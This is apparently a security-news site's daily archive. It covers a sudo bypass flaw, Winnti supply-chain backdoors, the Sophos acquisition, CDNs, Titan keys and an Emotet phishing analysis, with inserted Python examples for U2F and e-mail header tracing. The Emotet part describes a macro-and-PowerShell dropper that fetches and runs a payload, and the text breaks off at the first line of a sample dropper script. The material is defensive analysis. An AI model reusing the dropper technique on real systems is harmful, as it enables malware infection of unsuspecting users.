Daily Archives: October 14, 2019

Viewing cybersecurity incidents as normal accidents

As we continue on through National Cybersecurity Awareness Month (NCSAM), a time to focus on how cybersecurity is a shared responsibility that affects all Americans, one of the themes that I’ve been pondering is that of personal accountability. Years ago, I read Charles Perrow’s book, “Normal Accidents: Living with High-Risk Technologies,” which analyzes the social side of technological risk. When the book was first written in 1984, Perrow analyzed complex systems like nuclear power, aviation … More

The post Viewing cybersecurity incidents as normal accidents appeared first on Help Net Security.

Product showcase: Alsid for AD

You are using Active Directory (AD) every day, every hour, every minute when you log into your device, open your emails, access an application, or share a file. But, guess what, it’s also used by hackers on a daily basis. Simply put, when attackers take control of your AD, they inherit godlike powers over your IT. Sweet. Analyzing attack vectors: How attack pathways are born Active Directory itself is a robust product that suffered few … More

The post Product showcase: Alsid for AD appeared first on Help Net Security.

AI development has major security, privacy and ethical blind spots

Security, privacy and ethics are low-priority issues for developers when modeling their machine learning solutions, according to O’Reilly. Major issues: Security is the most serious blind spot. Nearly three-quarters (73 per cent) of respondents indicated they don’t check for security vulnerabilities during model building. More than half (59 per cent) of organizations also don’t consider fairness, bias or ethical issues during ML development. Privacy is similarly neglected, with only 35 per cent checking for issues … More

The post AI development has major security, privacy and ethical blind spots appeared first on Help Net Security.

Most expect the risk of privileged user abuse to increase

Insufficient privileged access management (PAM) practices continue to be a critical challenge for many organizations despite significant risks of data breaches and security incidents, according to Sila and Ponemon Institute. According to more than 650 North American respondents, 70 percent think it likely that privileged users within their organizations are accessing sensitive or confidential data for no discernible business need, and more than half expect privileged user abuse to increase in the next 12-24 months. Interestingly, … More

The post Most expect the risk of privileged user abuse to increase appeared first on Help Net Security.

Free SOAR Platforms eBook

A SOAR platform represents an evolution in security operations driven by the vast amounts of data that must be processed. Working off a single platform is critical to successful coordination of detection and response initiatives, as it keeps knowledge sharing across these teams fluid and instantaneous. Security orchestration and automation integrates different technologies and allows you to conduct defensive actions: it increases your effectiveness in stopping, containing, and preventing attacks. The great thing about SOAR … More

The post Free SOAR Platforms eBook appeared first on Help Net Security.

Private Cloud vs Public Cloud Security Challenges

As a system administrator during the early days of the “cloud revolution” I found the “cloud” metaphor an interesting choice to frame the technology stack. Clouds, in my mind, were “woolly” and hard to pin down as opposed to the omnipresent, always-available things that IT marketers were suggesting cloud services would be. But whilst I […]… Read More

The post Private Cloud vs Public Cloud Security Challenges appeared first on The State of Security.

IBM appraised CMMI V2.0 for Maturity Level 5

CMMI Institute announced that IBM is one of the first large IT organizations to be globally appraised on CMMI V2.0 for Maturity Level 5. The highly complex appraisal involved thousands of employees, more than 500 projects, across 6 global centers and 14 countries, and covered both traditional and new age projects that are part of IBM Global Business Services under IBM Services. IBM has been a trailblazer in setting superior quality and delivery standards. This … More

The post IBM appraised CMMI V2.0 for Maturity Level 5 appeared first on Help Net Security.

Sudo Flaw Lets Linux Users Run Commands As Root Even When They’re Restricted

Attention Linux Users! A new vulnerability has been discovered in Sudo—one of the most important, powerful, and commonly used utilities that comes as a core command installed on almost every UNIX and Linux-based operating system. The vulnerability in question is a sudo security policy bypass issue that could allow a malicious user or a program to execute arbitrary commands as root on a

SAP HANA Cloud Services has Canada written all over it

BARCELONA — SAP’s new cloud data storage products were formally revealed at its TechEd conference last week, and despite a round of layoffs announced earlier this year across its Canadian operations, Canada’s research hubs in Vancouver and Waterloo remain an integral part of SAP’s latest portfolio enhancements, executives told IT World Canada.

SAP’s chief technology officer Juergen Mueller took to the stage during his opening keynote on the heels of the company’s other TechEd event in Las Vegas, and explained how the company plans to make it easier for businesses to develop applications across its Business Technology Platform. Front and centre is SAP HANA Cloud Services, which combines all of SAP’s data and analytics capabilities as one set of interconnected services to store, process, govern and consume large volumes of data.

“We are becoming much more business-centric,” Mueller told audience members, acknowledging the fact that there was less of a focus on demonstrations with running code on the keynote stage. “SAP HANA Cloud offers one data access layer for all your data sources. It directly connects to your data from your on-premise HANA system, your third-party systems, and even Excel, without the need for data replication in order to work with that data.”

SAP HANA Cloud can be managed on the SAP Cloud platform using Kubernetes, and will significantly lower customers’ total cost of ownership for storing and managing petabytes’ worth of data, added Mueller. The company’s research hub in Vancouver has been hard at work for the past five years separating compute and storage with SAP HANA Cloud, ultimately allowing customers to scale both independently.

The expo floor at SAP TechEd in Barcelona. Photo by SAP.

“Vancouver is at the cutting edge of our machine learning and predictive analytics developments. They’re taking machine learning technology, and not thinking about just improving the product but thinking about how to connect it to people and the way they do work,” said Gerrit Kazmaier, SAP’s executive vice-president for analytics, databases, and data management, who spoke with IT World Canada after the morning keynotes.

SAP also unveiled the SAP Data Warehouse Cloud, a cloud-based repository under the SAP HANA Cloud umbrella, which according to Kazmaier, will help customers store petabytes worth of data without worrying about pesky capacity limitations. SAP’s other research hub in Waterloo was largely responsible for laying the groundwork for the repository.

As a result, customers will be able to put their newest or most valuable data in HANA’s in-memory repository and as the data is used less frequently, or “cools”, move it to HANA’s disk storage mode. Customers can eventually move that data to HANA’s new data lake, which is more cost-effective, once the heavy analytics is applied to it. And when data cools even further, they can move it to external data lakes, such as AWS S3 and Azure Data Lake all from within the SAP HANA Cloud.

Neil McGovern, senior director of product marketing for SAP, likened the company’s cloud strategy to the way people store photos on the public cloud.

“It’s the same idea. We’re just doing it with business data,” he explained, adding even C-Suite executives, who have been slow to fully grasp the value SAP can bring to the table due to the complexities around its products and the technology powering them, know the flexibility cloud can provide.

McGovern indicated that if a CIO today demands $25 million for a data centre during a boardroom meeting, there’s almost only one response.

“They’ll look at you and say ‘Go through the cloud instead’, and ‘Why are you employed with us?’”

General availability for SAP HANA Cloud and SAP Data Warehouse Cloud is planned for the fourth quarter of 2019.

Atlanta Judge Pleads Not Guilty to Improper Access of County Network


Superior Court judge Kathryn Schrader has pleaded not guilty to improperly accessing, altering, and removing data from the computer network of Gwinnett County, Georgia, located just northeast of Atlanta.

The judge was indicted on September 18, along with convicted child molester and co-founder of Atlanta sci-fi convention DragonCon, Ed Kramer; private investigator T.J. Ward; and Frank Karic. 

The defendants are each charged with three counts of felony computer trespass, to which they all pleaded not guilty at their arraignment last Thursday. If convicted of all the charges against them, the defendants could each face a maximum of 45 years behind bars.

According to the Gwinnett Daily Post, Schrader hired private detective Ward to monitor her work computer when she became suspicious that it had been hacked by district attorney Danny Porter. 

It is alleged that Schrader gave Ward improper access to the network. Ward then brought in Karic, who was given improper access so he could install a Wireshark monitoring device on Schrader's computer to discover if it had indeed been tampered with.

Ward then hired former computer forensic analyst Kramer, who was also given improper access so that he could keep tabs on Schrader's computer once the installation was complete. 

According to newspaper the Atlanta Journal-Constitution, Danny Porter has vehemently denied the allegation that he hacked Schrader's computer. 

The details of the alleged offence came to light during a search of Kramer's home computer by police in relation to allegations that he had photographed a young child at a Lawrenceville, Georgia, doctor's office. Police reportedly found a folder labeled with Schrader's name on Kramer's computer. 

Since searching Kramer's computer, police have charged him with possession of child pornography. 

The indictment states that between February 7 and 26, all four defendants "did knowingly use a computer network without authority and with the intent to remove network traffic, data from the computer network of Gwinnett County, contrary to the laws of said state, the good order, peace and dignity thereof." 

Schrader has been a judge on Gwinnett's highest court since 2012, but since April, while the investigation into her alleged criminal activities has been ongoing, Porter has sidelined Schrader from hearing any criminal cases prosecuted by his office. 

The Georgia Bureau of Investigation launched the investigation into Schrader and the three men accused along with her; however, the case has now been handed over to the Prosecuting Attorney's Council of Georgia, which is prosecuting the case.

The next hearing in the case is scheduled for November 7.

China has built ‘massive global data-collection ecosystem’ to boost its interests

Chinese use state-owned enterprises, local tech companies and foreign partnerships, ASPI report says

The Chinese government is sweeping up vast amounts of data from all around the world to bulwark the nation’s security, but most critically to secure the political future of the Communist party, a new report argues.

Engineering Global Consent, a policy brief by the Australian Strategic Policy Institute’s Dr Samantha Hoffman, argues that the Chinese party-state seeks to influence – and where possible control – global online and political environments so that public sentiment around the world is more favourable towards its interests. China has expanded its operations of influence into organisations such as universities in the UK, the US and Australia.


Why Use a Content Delivery Network (CDN)?

A Content Delivery Network (CDN) is a collection of interconnected computers that deliver web content quickly to different users. It caches or duplicates the content on various servers and directs each request to a server based on the user's proximity. The focus is to offer end-users content with excellent performance and availability. Today, CDNs host web objects, applications, downloadable objects, on-demand streaming media, real-time streaming data, and social networks.

A user requests content such as a file, video, or webpage. The CDN dynamically determines the server closest to that user and delivers the content from there. It is also responsible for replicating the content to numerous servers around the world, so that the same content can be served to many users even during peak times.

Who Can Use Content Delivery Network?

If you have rich digital content, you can take advantage of a CDN. Your users can access your software, game, media, and other information quickly and reliably. Consumers are after an excellent online experience when they watch a movie, play a game, stream an event, or shop online. If you’re able to provide what they need and want, they’ll surely be back for more of your content. In 2017, the estimated worth of the CDN services worldwide market was close to US$6.9 billion.

Pros of CDN

If you generate immense traffic on your site every day, you can use a content delivery network to your advantage. Numerous users access your content simultaneously. They may troop to your website because of a viral video. If they can’t access it quickly, they won’t spend another second to wait for it to load. They won’t even scour your other webpages. They’ll decide to leave immediately.

You don’t want that to happen, do you? Then, you need to use a CDN!

 

• A Decrease in Server Load

The strategic placement of servers around the world is the backbone of the content delivery network. If you use it, your website gains capacity and can serve more simultaneous users. Instead of housing your content on one server, it can be on many servers across the globe.

 

• Faster Delivery of Content

Because CDNs are more reliable, you can provide high-quality content with excellent service and low server loads. It means more cost savings for you. Since jQuery is everywhere on the web, someone may have accessed specific content previously through the Google CDN. Therefore, the browser has already cached it, and the user doesn’t need to download it again.

If the edge server hasn’t cached the content yet, the CDN can fetch it across the Internet using its knowledge of the interconnections within its own network. As such, it avoids peering problems between ISPs, time lost to DNS resolution, and packets lost to network outages. Moreover, advanced networks use specific technologies that can handle dynamic content that isn’t cacheable.

 

• Easier Segmentation of Audience

CDNs can offer multiple contents to diverse users. They can detect the type of device making the request. As such, they can provide device-specific content.

 

• Lower Packet Loss and Network Latency

Users experience enhanced stream quality and less jitter with CDNs. Therefore, as a content provider, you can offer high-definition quality without the extra costs and network load. Moreover, your audience will notice the high-quality service you provide them.

 

• Better Usage Analytics and Higher Availability

A content delivery network is capable of distributing assets dynamically to core, edge, and fallback servers strategically placed in different countries. It can offer real-time load views and statistics, optimize per-customer capacity, and report customer-viewing details. Moreover, it can display dynamic regions and show preferred assets. It can also provide 100% availability, even when there are widespread hardware, network, or power outages.

When we say availability, it means that your content is easily accessible even during intermittent spikes, excessive user traffic, or possible server outages. If the traffic reaches thousands, if not millions, of requests, even the most robust origin servers can bog down. Your origin infrastructure will absorb all the traffic, which can cause it to fail. This scenario can result in lost business and a terrible experience for the end-users. However, if you use a CDN, you gain access to its massive server infrastructure around the world. Your content remains available to more users.

 

• Security and Storage

CDNs provide secure storage for content like videos. Moreover, they offer enhanced data backup and archiving services. Digital Rights Management ensures the security of content as well as limiting access through user authentication.

High-value online transactions and data continue to increase; therefore, hackers also work nonstop to find ways to exploit the situation. They cause businesses to lose money. In a 2015 Ponemon Institute report on cyber crime, the average loss attributed to these attackers was US$7.7 million. Web-based and DDoS attacks, as well as crimes by malicious insiders, result in the most expensive damages.

Attacks like SQL injection, remote or local file inclusion and cross-site scripting are also prevalent as they divert attention. Often, it is difficult to differentiate between legitimate and bad traffic. Thus, dedicated security resources must evolve rapidly for up-to-date mitigation strategies.

You can reduce the impact of these issues if you take advantage of a content delivery network. You need to protect your websites because of the increasing Internet threats. Advanced CDNs secure information competently by offering dedicated solutions to protect you and your users. Various attacks may compromise your content availability and delivery, but hosting your content on a content delivery network can mitigate them.

Conclusion

A content delivery network (CDN) is an essential service that you need if you’re a content provider. End users now demand a satisfying experience, so they won’t be patient with slow downloads. If you can’t provide fast and competent loading of content, chances are they will search for information on other websites. Of course, no one wants users losing interest in their content and leaving the site for good. So, search for a CDN provider today.

Rated P for Private? It’s Time to Re-think Privacy

You probably know privacy is a thing of the past, that is unless you spend a lot of time digging for freshwater clams in marshlands of Loon Lake. Mark Zuckerberg said it years ago, but he thought it was a good thing. In the wake of the Equifax breach and Cambridge Analytica, the end of privacy is no longer scary. It’s neutral. We’ve reached a “Now What?” moment.

Is It the Algorithm or the Microphone?

We can all agree paranoia is bad for business, and there’s plenty to go around these days whether you’re on the marketing side of things, the breach side, or the consumer side.

With no expectation of privacy, we’ve become a little numb to the parade of stories–both reported by the media and anecdotal–of connected devices eavesdropping on us–serving ads for things mentioned in casual conversation. But we’re all online every day, and in the process leave a trail of cookie crumbs for marketers to find us. There’s no need for a hidden mic.

While many enjoy the convenience that facial recognition provides in retail micro-targeting products and services, others hate it. We’ve heard the cringe-worthy news about health apps sharing some of the more intimate details of our sex lives with Facebook, Google, and other third parties.

Some of us shrug it off. The convenience made possible by the forfeiture of privacy is worth it to them. For others, it is an unacceptable situation. This is unfortunate, because it’s not a situation. It’s the new norm, and none of it inspires a feeling of security.

A worried customer or client is a hesitant customer or client. So, how do you ease that tension? I would argue that, ironically, you can do this by creating a high information environment, where everyone can make informed decisions about how they want to interact with businesses and services.

Moving Right Along…

The need to protect privacy no longer needs an introduction. There’s plenty of legislation. New privacy laws in New York and Nevada go into effect in October, with California’s CCPA following in January 2020. Maine and Vermont have already enacted stronger laws to that effect, and many states are expected to follow.

There’s a big “but” here. Without the right solutions provider navigating privacy law can be prohibitively expensive for small to medium-sized companies. Add to that the possibility of compliance costs in a marketplace with many different laws, and we have a potential company killer on our hands. Google may be able to weather a $170 million fine for non-compliance without flinching; most of us can’t.

A Modest Proposal

Once upon a time, Hollywood was faced with a similar situation. In the beginning, there was no ratings system and it was a problem. There were many family-friendly films and then there were those that would make Mae West blush, but there was no way for the audience to know which was which. The result was an opportunity cost. Some people avoided the movies because they were perceived as scandalous.

Enter the Motion Picture Producers and Distributors of America (MPPDA, later the MPAA), which set guidelines later formalized as the movie rating system still used today. It’s not a perfect system, but the benefits outweigh its flaws. First of all, it’s voluntary. The MPAA created an opt-in industry standard, avoiding the need for legislation. The gaming industry also rates its products.

Most importantly, it was end-user friendly. You don’t need to know anything about Rambo: Last Blood or Abominable to decide which is better for kids; one is Rated R and one is Rated G. A similar system might work for websites and apps.

Here’s a sketch of what that might look like:

P–Protected User: Data is either not collected or it is protected and in compliance with online standards such as the GDPR, CCPA, SHIELD, HIPAA, COPA or PIPEDA.

ND–Not Distributed: Personally identifying information is collected to personalize an experience (location, ad preferences, etc.) but it is not shared with third parties.

A–Anonymized: Non-identifying usage data is collected and shared with third parties. (Forget for the moment that there’s no such thing as anonymized data that can’t potentially be re-identified in today’s deep data environment).

S–Shared: User data is collected, shared, and/or sold to third parties. (Think: Naked in a glass house.)

If a collection of privacy and data use experts could get together on the creation of this rating system, privacy policies would no longer be so perilous.

Would it work? Online privacy is getting more complex with every new whizbang, regulation, law, court case, breach, compromise, and scandal. Any workable solution needs to counter that with a general approach that can be applied globally.

If this isn’t it, it’s time to figure out what is.

The post Rated P for Private? It’s Time to Re-think Privacy appeared first on Adam Levin.

Thoma Bravo Buys Sophos Group for $3.8bn


A British manufacturer of cybersecurity products has been bought by American private equity firm Thoma Bravo for $3.8bn.

Thoma Bravo, which raised billions for its latest private equity fund this year, bought Imperva and another cybersecurity firm, Veracode, in late 2018. In a buyout deal announced earlier today, Thoma Bravo said that it will be adding Sophos Group to its fast-growing cybersecurity portfolio. 

Sophos manufactures antivirus and encryption products for an impressive list of customers that includes Under Armour Inc., Ford Motor Co., and Toshiba Corp.

Thoma Bravo already owns Sophos' close competitor Barracuda Networks, which made a name for itself managing data security over the cloud. 

Shares in Sophos were listed at 225 pence per share in 2015, but since then they have more than doubled to the 583 pence per share closing price recorded on Friday, October 11. 

In a statement released today, Sophos CEO Kris Hagerman said: "Sophos is actively driving the transition in next-generation cybersecurity solutions, leveraging advanced capabilities in cloud, machine learning, APIs, automation, managed threat response, and more. We continue to execute a highly effective and differentiated strategy, and we see this offer as a compelling validation of Sophos, its position in the industry and its progress."

Hagerman told news organization Reuters that his company was first approached by Thoma Bravo in June of this year.

"The (Sophos) board ultimately concluded that this offer and the acquisition can accelerate Sophos' progress in next-generation cybersecurity," Hagerman said.

Thoma Bravo is a leading private equity firm focused on the software- and technology-enabled services sector with more than $35bn in investor commitments. With a 40-year history, Thoma Bravo has acquired more than 200 software and technology companies representing more than $50bn of value.

In a statement released on Monday, Seth Boro, managing partner at Thoma Bravo, said: "The Acquisition fits with our strategy of investing in and growing software and technology businesses globally. 

"The global cybersecurity market is evolving rapidly, driven by significant technological innovation, as cyber threats to business increase in scope and complexity. Sophos has a market-leading product portfolio and we believe that, by applying Thoma Bravo's expertise, operational framework and experience, we can support the business and accelerate its evolution and growth."

USB-C Titan Security Keys – available tomorrow in the US
Securing access to online accounts is critical for safeguarding private, financial, and other sensitive data online. Phishing - where an attacker tries to trick you into giving them your username and password - is one of the most common causes of data breaches. To protect user accounts, we’ve long made it a priority to offer users many convenient forms of 2-Step Verification (2SV), also known as two-factor authentication (2FA), in addition to Google’s automatic protections. These measures help to ensure that users are not relying solely on passwords for account security.

For users at higher risk (e.g., IT administrators, executives, politicians, activists) who need more effective protection against targeted attacks, security keys provide the strongest form of 2FA. To make this phishing-resistant security accessible to more people and businesses, we recently built this capability into Android phones, expanded the availability of Titan Security Keys to more regions (Canada, France, Japan, the UK), and extended Google’s Advanced Protection Program to the enterprise.

Starting tomorrow, you will have an additional option: Google’s new USB-C Titan Security Key, compatible with your Android, Chrome OS, macOS, and Windows devices.

USB-C Titan Security Key


We partnered with Yubico to manufacture the USB-C Titan Security Key. We have had a long-standing working and customer relationship with Yubico that began in 2012 with the collaborative effort to create the FIDO Universal 2nd Factor (U2F) standard, the first open standard to enable phishing-resistant authentication. This is the same security technology that we use at Google to protect access to internal applications and systems.

USB-C Titan Security Keys are built with a hardware secure element chip that includes firmware engineered by Google to verify the key’s integrity. This is the same secure element chip and firmware that we use in our existing USB-A/NFC and Bluetooth/NFC/USB Titan Security Key models manufactured in partnership with Feitian Technologies.

USB-C Titan Security Keys will be available tomorrow individually for $40 on the Google Store in the United States. USB-A/NFC and Bluetooth/NFC/USB Titan Security Keys will also become available individually in addition to the existing bundle. Bulk orders are available for enterprise organizations in select countries.

We highly recommend that all users at higher risk of targeted attacks get Titan Security Keys and enroll in the Advanced Protection Program (APP), which provides Google’s industry-leading security protections to defend against evolving methods that attackers use to gain access to your accounts and data. You can also use Titan Security Keys for any site where FIDO security keys are supported for 2FA, including your personal or work Google Account, 1Password, Coinbase, Dropbox, Facebook, GitHub, Salesforce, Stripe, Twitter, and more.
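The phishing resistance described above comes from origin binding: the browser, not the web page's script, records the origin it is actually displaying in the data the key signs, and the key uses a different credential for every origin, so a look-alike site relaying a genuine challenge obtains an assertion the real site rejects. The following Python simulation is an added example, not Google's or Yubico's code: it uses HMAC-SHA256 with a key derived inside the simulated device as a stand-in for the per-registration ECDSA signature a real U2F key produces, and the origins and names are constructed.

```python
"""FIDO U2F origin binding, simulated (added example; not Google's or Yubico's code).

A real security key signs with a per-registration ECDSA key. Here HMAC-SHA256
with a key derived inside the simulated device stands in for that signature so
the example runs with only the standard library; the challenge, origin and
counter handling follows U2F, the signature primitive is the simplification.
"""
import hashlib
import hmac
import json
import secrets

RP_ORIGIN = "https://accounts.example"          # assumed relying-party origin
PHISH_ORIGIN = "https://accounts-example.evil"  # assumed look-alike phishing origin


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


class SecurityKey:
    """The authenticator. Its master secret never leaves the device."""

    def __init__(self):
        self._master = secrets.token_bytes(32)
        self.counter = 0

    def _site_key(self, app_id: str, key_handle: bytes) -> bytes:
        # Derived from the device secret, the application parameter (hash of
        # the origin) and the key handle: a different origin gives a different
        # key, which is what makes the credential origin-bound.
        return hmac.new(self._master, sha256(app_id.encode()) + key_handle, hashlib.sha256).digest()

    def register(self, app_id: str):
        key_handle = secrets.token_bytes(32)
        return key_handle, self._site_key(app_id, key_handle)

    def sign(self, app_id: str, key_handle: bytes, client_data: bytes):
        self.counter += 1
        signed = sha256(app_id.encode()) + self.counter.to_bytes(4, "big") + sha256(client_data)
        return self.counter, hmac.new(self._site_key(app_id, key_handle), signed, hashlib.sha256).digest()


class RelyingParty:
    """The website verifying the second factor."""

    def __init__(self, origin: str):
        self.origin = origin
        self.registrations = {}   # key_handle -> (verification key, last counter seen)
        self.pending = set()      # challenges issued but not yet consumed

    def register(self, key: SecurityKey) -> bytes:
        key_handle, vkey = key.register(self.origin)
        self.registrations[key_handle] = (vkey, 0)
        return key_handle

    def new_challenge(self) -> str:
        challenge = secrets.token_urlsafe(32)
        self.pending.add(challenge)
        return challenge

    def verify(self, key_handle: bytes, client_data: bytes, counter: int, signature: bytes) -> bool:
        cd = json.loads(client_data)
        if cd.get("origin") != self.origin:            # signed for a look-alike site
            return False
        if cd.get("challenge") not in self.pending:    # unknown or already used
            return False
        if key_handle not in self.registrations:
            return False
        vkey, last_counter = self.registrations[key_handle]
        if counter <= last_counter:                    # replay or cloned key
            return False
        signed = sha256(self.origin.encode()) + counter.to_bytes(4, "big") + sha256(client_data)
        if not hmac.compare_digest(hmac.new(vkey, signed, hashlib.sha256).digest(), signature):
            return False
        self.pending.discard(cd["challenge"])
        self.registrations[key_handle] = (vkey, counter)
        return True


def browser_sign(key: SecurityKey, page_origin: str, key_handle: bytes, challenge: str):
    # The browser, not the page's script, records the origin it is showing.
    client_data = json.dumps({"typ": "navigator.id.getAssertion",
                              "challenge": challenge, "origin": page_origin}).encode()
    counter, sig = key.sign(page_origin, key_handle, client_data)
    return client_data, counter, sig


def login(rp: RelyingParty, key: SecurityKey, key_handle: bytes, page_origin: str):
    """One 2FA attempt from a page at page_origin that relays the RP's challenge."""
    challenge = rp.new_challenge()
    assertion = browser_sign(key, page_origin, key_handle, challenge)
    return rp.verify(key_handle, *assertion), assertion


def demo() -> dict:
    key = SecurityKey()
    rp = RelyingParty(RP_ORIGIN)
    handle = rp.register(key)
    genuine, assertion = login(rp, key, handle, RP_ORIGIN)
    phished, _ = login(rp, key, handle, PHISH_ORIGIN)   # attacker relays the real challenge
    replayed = rp.verify(handle, *assertion)            # the same assertion submitted again
    return {"genuine_site": genuine, "phishing_site": phished, "replayed_assertion": replayed}


if __name__ == "__main__":
    print(demo())
```

The three checks in `verify` are the ones that matter in practice: the origin check defeats a relayed challenge, the pending-challenge check defeats replay of a captured assertion, and the monotonic counter surfaces a cloned key. Real deployments verify an ECDSA signature against a public key stored at registration, which the symmetric stand-in here does not model.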

Tactics of Supply-Chain Attack Group Exposed


Researchers have exposed the underhanded methods of a threat group responsible for unleashing a string of supply-chain attacks.

Winnti Group has been targeting the gaming industry for nearly a decade. Their preferred mode of attack is to compromise game developers, insert backdoors into a game’s build environment, and then have their malware distributed as legitimate software.

In April 2013, Kaspersky Lab reported that in 2011 Winnti had altered a video game to include a backdoor. Then, in March 2019, ESET published research proving that the threat group was responsible for compromising and adding a backdoor to two other games and a gaming platform. 

Gamers in Asia were the target in the most recent supply-chain attack, which researchers estimate affected "tens or hundreds of thousands" of people. Over half of the victims—55%—were located in Thailand. 

Following this publication, ESET continued its investigation to discover how organizations’ digital supply chains had been compromised to deliver malware in their applications. 

"Searching for a small piece of well-hidden code added to a sometimes huge, existing code base is like finding a needle in a haystack. However, we relied on behaviors and code similarity to help us spot the needle," says ESET researcher Marc-Étienne Léveillé.

The Winnti Group uses a packer in a backdoor dubbed PortReuse. In collaboration with Censys, ESET performed an internet-wide scan to try to identify one variant of the backdoor, as well as potential victims. 

Léveillé said: "Since we were intrigued by the unique packer used in the recent supply-chain attacks against the gaming industry in Asia, we went on the hunt to find out if it was used elsewhere. And it was." 

With their new research, ESET was able to warn one major mobile software and hardware manufacturer in Asia that they had been compromised with PortReuse. ESET also analyzed new variants of Shadowpad, another backdoor used by the Winnti Group, still being maintained and actively used by its operators.

Although Winnti is known principally for espionage, researchers discovered that the group was also using a botnet to mine cryptocurrencies.

Léveillé said: "Perhaps they use the virtual money they mine to finance their other operations. Maybe they use it for renting servers and registering domain names. But at this point, we cannot exclude that they, or one of their subgroups, could be motivated by financial gain."

Imperva’s Breach Post-Mortem: API Key Left Exposed

Imperva Says Key Was Stolen and Used to Take Critical Customer Database
Cybersecurity vendor Imperva's breach post-mortem should serve as a warning to all those using cloud services: one mistake can turn into a calamity. The company accidentally left an AWS API key exposed to the internet; the key was then stolen and used to steal a sensitive customer database.

Is Emotet gang targeting companies with external SOC?

Introduction

The group behind the Emotet malware is getting smarter and smarter in the way it delivers it. While the infection scheme has looked the same for years, the way the group tries to lure victims improves from day to day.
Today I’d like to share a quick analysis of a very interesting email that claimed to deliver a SOC “weekly report” to the victim’s mailbox. The attacker knew the target organization was protected by a SOC (Security Operation Center), so she sent a well-crafted email claiming to deliver a Microsoft Word document containing the weekly SOC report, as if it were a routine activity, in order to induce the victim to open it.

SOC report 10 12 2019.doc (6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7) is the delivered file, sent on Oct 11, 2019 at 11:06:09 PM from grecia@ambientehomedecor.com. I believe that ambientehomedecor.com is not a malicious domain but rather a newly compromised one.

Technical Analysis

Hash: 6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7
Threat: Word document dropper (Emotet)
Brief description: first stage of an Emotet campaign targeting organizations with a Security Operation Center
Ssdeep: 6144:tkPNPASKUzSRnLx3Q4td9pB8LGme764XNNHBly:tkPNPAfUGRt3b3B8LGL6CNJ

Following the original email headers from grecia@ambientehomedecor.com to the victim’s mailbox, it is possible to figure out that the attacker used an SMTP client that left a trace of the original sender IP address, which happens to be 81.48.36.59. According to IPLocation, that address belongs to Thury-Harcourt, a small town in northern France.

Thury-Harcourt, France. Sender IP
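The same header walk can be done in code. The script below is an added example, not part of the original post: it parses the Received: chain from the bottom (earliest hop) upwards and returns the first routable client address. The header block is constructed to mirror the case described above (a submission from 81.48.36.59 through the sender domain’s mail server); the victim hostnames, message IDs and the relay’s address are invented.

```python
"""Recover the originating client IP from an e-mail's Received: chain.

Added example, not code from the original post. CONSTRUCTED_HEADERS is made up
to mirror the post's case; only the sender address and 81.48.36.59 come from it.
"""
import ipaddress
import re
from email import message_from_string
from typing import List, Optional

# Constructed sample. Received: headers are prepended by each relay, so the
# topmost one is the last hop (the victim's MX) and the bottom one the first.
CONSTRUCTED_HEADERS = """\
Received: from mail.ambientehomedecor.com (mail.ambientehomedecor.com [203.0.113.25])
\tby mx.victim.example (Postfix) with ESMTPS id 4C2xyz
\tfor <soc@victim.example>; Fri, 11 Oct 2019 23:06:09 +0000
Received: from [81.48.36.59] (unknown [81.48.36.59])
\tby mail.ambientehomedecor.com (Postfix) with ESMTPA id 9F1abc;
\tFri, 11 Oct 2019 23:06:05 +0000
From: grecia@ambientehomedecor.com
To: soc@victim.example
Subject: SOC report 10 12 2019

"""

# Bracketed dotted-quad, the form MTAs use for the connecting client's address.
RECEIVED_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_hops(raw_message: str) -> List[Optional[str]]:
    """Client IP recorded in each Received: header, earliest hop first (None if absent)."""
    msg = message_from_string(raw_message)
    hops: List[Optional[str]] = []
    for value in reversed(msg.get_all("Received", [])):
        m = RECEIVED_IP_RE.search(value)
        hops.append(m.group(1) if m else None)
    return hops


def originating_ip(raw_message: str) -> Optional[str]:
    """First routable client IP in the chain, i.e. the host that submitted the mail.

    Caveat: only hops added by relays you trust are authoritative. Everything
    below the first trusted relay was written by the sender's side and can be
    forged, so treat the result as a lead, not proof.
    """
    for ip in received_hops(raw_message):
        if ip is None:
            continue
        addr = ipaddress.ip_address(ip)
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            continue  # internal relay, not the submitting client
        return ip
    return None


if __name__ == "__main__":
    print("hops (earliest first):", received_hops(CONSTRUCTED_HEADERS))
    print("originating IP:", originating_ip(CONSTRUCTED_HEADERS))
```

In this constructed case the bottom header is the one written by the compromised sender’s server when the attacker’s client authenticated to it (ESMTPA), which is exactly the trace the analysis relies on.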

The attached document is a well-obfuscated Microsoft Word document that asks the user to enable macros in order to view its content. The AutoOpen function starts a complex obfuscated chain that tries to deter analysts by introducing junk code, junk variable assignments and fake but plausible-looking comments. The following image shows the obfuscation technique. The function c878cxx90590 is the “real code”: it is not part of the junk but the function that actually performs the malicious actions. As you can see, buried in the middle of hundreds of similar lines of code, it is hard to spot.

Obfuscated Macro

The obfuscated macro creates in-memory objects and runs them without passing through temporary files. The following image shows the objects created before the drop-and-execute step. The variable analysed in the image is c0639047895c6 which, in that specific run, holds the Win32_ProcessStartup object (the WMI class that configures how a process spawned through Win32_Process.Create is started, typically with a hidden window) used to launch the payload on the victim machine.

Object Building

Once the dropper has built the objects it needs, it carves from itself the following PowerShell script. The script runs an encoded string hiding the drop URLs. The base64-decoded string shows a plain foreach statement looping through a list of compromised websites hosting the real payload: de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216 (VT 6/69). It saves the dropped file in a user-profile location held in the variable xc0x57b38b2x7 and then runs it. The following image shows the PowerShell script before and after decoding, with a quick description.

Final Deobfuscated Dropper
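To reproduce the decoding step outside a sandbox, here is an added example (not the author’s code) that takes a PowerShell -EncodedCommand blob, decodes the UTF-16LE base64, extracts the URLs and defangs them in the bracket style used in the IoC list of this post. The encoded script is constructed for the example and only imitates the shape described above: the variable name xc0x57b38b2x7 and the two drop URLs are taken from the post, the file name and the loop body are made up.

```python
"""Decode a PowerShell -EncodedCommand payload and pull out its drop URLs.

Added example, not code from the original post. SAMPLE_SCRIPT is a constructed
stand-in for the dropper; it is never executed here, only encoded and decoded.
"""
import base64
import re
from typing import List

# Constructed dropper in the shape the analysis describes: a foreach over drop
# URLs that downloads the payload into the user profile and runs it.
SAMPLE_SCRIPT = r"""
$xc0x57b38b2x7 = $env:userprofile + '\' + 'lk3j.exe';
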